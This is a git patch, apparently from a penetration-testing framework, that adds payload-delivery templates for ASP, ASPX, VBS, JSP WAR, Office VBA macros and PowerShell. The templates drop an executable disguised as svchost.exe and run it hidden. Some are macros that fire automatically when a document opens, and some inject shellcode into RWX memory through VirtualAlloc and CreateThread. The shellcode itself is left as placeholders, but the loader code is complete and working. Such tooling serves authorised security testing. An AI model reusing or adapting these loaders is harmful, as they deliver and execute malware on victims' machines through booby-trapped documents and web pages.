From c2cf822013378297d387a240196fe09ec03caf34 Mon Sep 17 00:00:00 2001 From: Shelby Spencer Date: Tue, 20 Aug 2013 16:52:58 -0700 Subject: [PATCH] Commit adding the template scripts. --- .../templates/scripts/to_exe_asp.asp.template | 23 ++++++ .../scripts/to_exe_aspx.aspx.template | 34 ++++++++ data/templates/scripts/to_exe_vba.vb.template | 80 +++++++++++++++++++ data/templates/scripts/to_exe_vbs.vb.template | 24 ++++++ .../templates/scripts/to_jsp_war.war.template | 49 ++++++++++++ data/templates/scripts/to_vba.vb.template | 32 ++++++++ .../scripts/to_win32pe_psh.ps1.template | 19 +++++ .../scripts/to_win32pe_psh_net.ps1.template | 30 +++++++ 8 files changed, 291 insertions(+) create mode 100644 data/templates/scripts/to_exe_asp.asp.template create mode 100644 data/templates/scripts/to_exe_aspx.aspx.template create mode 100644 data/templates/scripts/to_exe_vba.vb.template create mode 100644 data/templates/scripts/to_exe_vbs.vb.template create mode 100644 data/templates/scripts/to_jsp_war.war.template create mode 100644 data/templates/scripts/to_vba.vb.template create mode 100644 data/templates/scripts/to_win32pe_psh.ps1.template create mode 100644 data/templates/scripts/to_win32pe_psh_net.ps1.template diff --git a/data/templates/scripts/to_exe_asp.asp.template b/data/templates/scripts/to_exe_asp.asp.template new file mode 100644 index 0000000000..a4410a212a --- /dev/null +++ b/data/templates/scripts/to_exe_asp.asp.template @@ -0,0 +1,23 @@ +<% + Sub %{var_func}() + %{var_bytes}=Chr(%{exe[0]})%{var_shellcode} + Dim %{var_obj} + Set %{var_obj} = CreateObject("Scripting.FileSystemObject") + Dim %{var_stream} + Dim %{var_tempdir} + Dim %{var_tempexe} + Dim %{var_basedir} + Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2) + %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName() + %{var_obj}.CreateFolder(%{var_basedir}) + %{var_tempexe} = %{var_basedir} & "\" & "svchost.exe" + Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0) + %{var_stream}.Write %{var_bytes} + %{var_stream}.Close + Dim %{var_shell} + Set %{var_shell} = CreateObject("Wscript.Shell") + %{var_shell}.run %{var_tempexe}, 0, false + End Sub + + %{var_func} +%> diff --git a/data/templates/scripts/to_exe_aspx.aspx.template b/data/templates/scripts/to_exe_aspx.aspx.template new file mode 100644 index 0000000000..966741fc6f --- /dev/null +++ b/data/templates/scripts/to_exe_aspx.aspx.template @@ -0,0 +1,34 @@ +<%@ Page Language="C#" AutoEventWireup="true" %> +<%@ Import Namespace="System.IO" %> + diff --git a/data/templates/scripts/to_exe_vba.vb.template b/data/templates/scripts/to_exe_vba.vb.template new file mode 100644 index 0000000000..52aec8ff72 --- /dev/null +++ b/data/templates/scripts/to_exe_vba.vb.template @@ -0,0 +1,80 @@ +'************************************************************** +'* +'* This code is now split into two pieces: +'* 1. The Macro. This must be copied into the Office document +'* macro editor. This macro will run on startup. +'* +'* 2. The Data. The hex dump at the end of this output must be +'* appended to the end of the document contents. +'* +'************************************************************** +'* +'* MACRO CODE +'* +'************************************************************** + +Sub Auto_Open() + %{func_name1} +End Sub + +Sub %{func_name1}() + Dim %{var_appnr} As Integer + Dim %{var_fname} As String + Dim %{var_fenvi} As String + Dim %{var_fhand} As Integer + Dim %{var_parag} As Paragraph + Dim %{var_index} As Integer + Dim %{var_gotmagic} As Boolean + Dim %{var_itemp} As Integer + Dim %{var_stemp} As String + Dim %{var_btemp} As Byte + Dim %{var_magic} as String + %{var_magic} = "%{var_magic}" + %{var_fname} = "%{filename}.exe" + %{var_fenvi} = Environ("USERPROFILE") + ChDrive (%{var_fenvi}) + ChDir (%{var_fenvi}) + %{var_fhand} = FreeFile() + Open %{var_fname} For Binary As %{var_fhand} + For Each %{var_parag} in ActiveDocument.Paragraphs + DoEvents + %{var_stemp} = %{var_parag}.Range.Text + If (%{var_gotmagic} = True) Then + %{var_index} = 1 + While (%{var_index} < Len(%{var_stemp})) + %{var_btemp} = Mid(%{var_stemp},%{var_index},4) + #Put %{var_fhand}, , %{var_btemp} + %{var_index} = %{var_index} + 4 + Wend + ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then + %{var_gotmagic} = True + End If + Next + Close %{var_fhand} + %{func_name2}(%{var_fname}) +End Sub + +Sub %{func_name2}(%{var_farg} As String) + Dim %{var_appnr} As Integer + Dim %{var_fenvi} As String + %{var_fenvi} = Environ("USERPROFILE") + ChDrive (%{var_fenvi}) + ChDir (%{var_fenvi}) + %{var_appnr} = Shell(%{var_farg}, vbHide) +End Sub + +Sub AutoOpen() + Auto_Open +End Sub + +Sub Workbook_Open() + Auto_Open +End Sub + +'************************************************************** +'* +'* PAYLOAD DATA +'* +'************************************************************** + +%{var_magic}%{data} diff --git a/data/templates/scripts/to_exe_vbs.vb.template b/data/templates/scripts/to_exe_vbs.vb.template new file mode 100644 index 0000000000..aa22756688 --- /dev/null +++ b/data/templates/scripts/to_exe_vbs.vb.template @@ -0,0 +1,24 @@ +Function %{var_func}() + %{var_bytes}=Chr(%{exe[0]})%{var_shellcode} + + Dim %{var_obj} + Set %{var_obj} = CreateObject("Scripting.FileSystemObject") + Dim %{var_stream} + Dim %{var_tempdir} + Dim %{var_tempexe} + Dim %{var_basedir} + Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2) + %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName() + %{var_obj}.CreateFolder(%{var_basedir}) + %{var_tempexe} = %{var_basedir} & "\" & "svchost.exe" + Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false) + %{var_stream}.Write %{var_bytes} + %{var_stream}.Close + Dim %{var_shell} + Set %{var_shell} = CreateObject("Wscript.Shell") + %{var_shell}.run %{var_tempexe}, 0, true + %{var_obj}.DeleteFile(%{var_tempexe}) + %{var_obj}.DeleteFolder(%{var_basedir}) +End Function + +%{init} diff --git a/data/templates/scripts/to_jsp_war.war.template b/data/templates/scripts/to_jsp_war.war.template new file mode 100644 index 0000000000..400cf02317 --- /dev/null +++ b/data/templates/scripts/to_jsp_war.war.template @@ -0,0 +1,49 @@ +<%@ page import="java.io.*" %> +<% + String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt"; + String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}"; + String %{var_data} = ""; + + if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) + { + %{var_exepath} = %{var_exepath}.concat(".exe"); + } + + FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath}); + FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath}); + + int %{var_numbytes} = %{var_inputstream}.available(); + byte %{var_bytearray}[] = new byte[%{var_numbytes}]; + %{var_inputstream}.read(%{var_bytearray}); + %{var_inputstream}.close(); + byte[] %{var_bytes} = new byte[%{var_numbytes}/2]; + for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2) + { + char %{var_char1} = (char) %{var_bytearray}[%{var_counter}]; + char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1]; + int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff; + %{var_comb} <<= 4; + %{var_comb} += Character.digit(%{var_char2}, 16) & 0xff; + %{var_bytes}[%{var_counter}/2] = (byte)%{var_comb}; + } + + %{var_outputstream}.write(%{var_bytes}); + %{var_outputstream}.close(); + + if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){ + String[] %{var_fperm} = new String[3]; + %{var_fperm}[0] = "chmod"; + %{var_fperm}[1] = "+x"; + %{var_fperm}[2] = %{var_exepath}; + Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm}); + if (%{var_proc}.waitFor() == 0) { + %{var_proc} = Runtime.getRuntime().exec(%{var_exepath}); + } + + File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete(); + } + else + { + Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath}); + } +%> diff --git a/data/templates/scripts/to_vba.vb.template b/data/templates/scripts/to_vba.vb.template new file mode 100644 index 0000000000..036d3ccc76 --- /dev/null +++ b/data/templates/scripts/to_vba.vb.template @@ -0,0 +1,32 @@ +#If Vba7 Then + Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr + Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr + Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr +#Else + Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long + Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long + Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long +#EndIf + +Sub Auto_Open() + Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long +#If Vba7 Then + Dim %{var_rwxpage} As LongPtr, %{var_res} As LongPtr +#Else + Dim %{var_rwxpage} As Long, %{var_res} As Long +#EndIf + %{var_myArray} = Array(%{bytes}) + %{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40) + For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray}) + %{var_myByte} = %{var_myArray}(%{var_offset}) + %{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1) + Next %{var_offset} + %{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0) +End Sub +Sub AutoOpen() + Auto_Open +End Sub +Sub Workbook_Open() + Auto_Open +End Sub + diff --git a/data/templates/scripts/to_win32pe_psh.ps1.template b/data/templates/scripts/to_win32pe_psh.ps1.template new file mode 100644 index 0000000000..e23d3719c4 --- /dev/null +++ b/data/templates/scripts/to_win32pe_psh.ps1.template @@ -0,0 +1,19 @@ +$%{var_code} = @" +[DllImport("kernel32.dll")] +public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); +[DllImport("kernel32.dll")] +public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); +[DllImport("msvcrt.dll")] +public static extern IntPtr memset(IntPtr dest, uint src, uint count); +"@ + +$%{var_win32_func} = Add-Type -memberDefinition $%{var_code} -Name "Win32" -namespace Win32Functions -passthru +[Byte[]]$%{var_payload} = 0x%{code[0].to_s(16)}%{shellcode} + +$%{var_size} = 0x1000 + +if ($%{var_payload}.Length -gt 0x1000) {$%{var_size} = $%{var_payload}.Length} +$%{var_rwx}=$%{var_win32_func}::VirtualAlloc(0,0x1000,$%{var_size},0x40) +for ($%{var_iter}=0;$%{var_iter} -le ($%{var_payload}.Length-1);$%{var_iter}++) {$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_payload}[$%{var_iter}], 1)} +$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0) + diff --git a/data/templates/scripts/to_win32pe_psh_net.ps1.template b/data/templates/scripts/to_win32pe_psh_net.ps1.template new file mode 100644 index 0000000000..027d586bb8 --- /dev/null +++ b/data/templates/scripts/to_win32pe_psh_net.ps1.template @@ -0,0 +1,30 @@ +Set-StrictMode -Version 2 +$%{var_syscode} = @" + using System; + using System.Runtime.InteropServices; + namespace %{var_kernel32} { + public class func { + [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 } + [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 } + [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF } + [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); + [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); + [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds); + } + } +"@ + +$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider +$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters +$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location)) +$%{var_compileParams}.GenerateInMemory = $True +$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode}) + +[Byte[]]$%{var_code} = 0x%{code[0].to_s(16)}%{shellcode} + +$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite) +if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return } +[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length) +[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0) +if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return } +$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)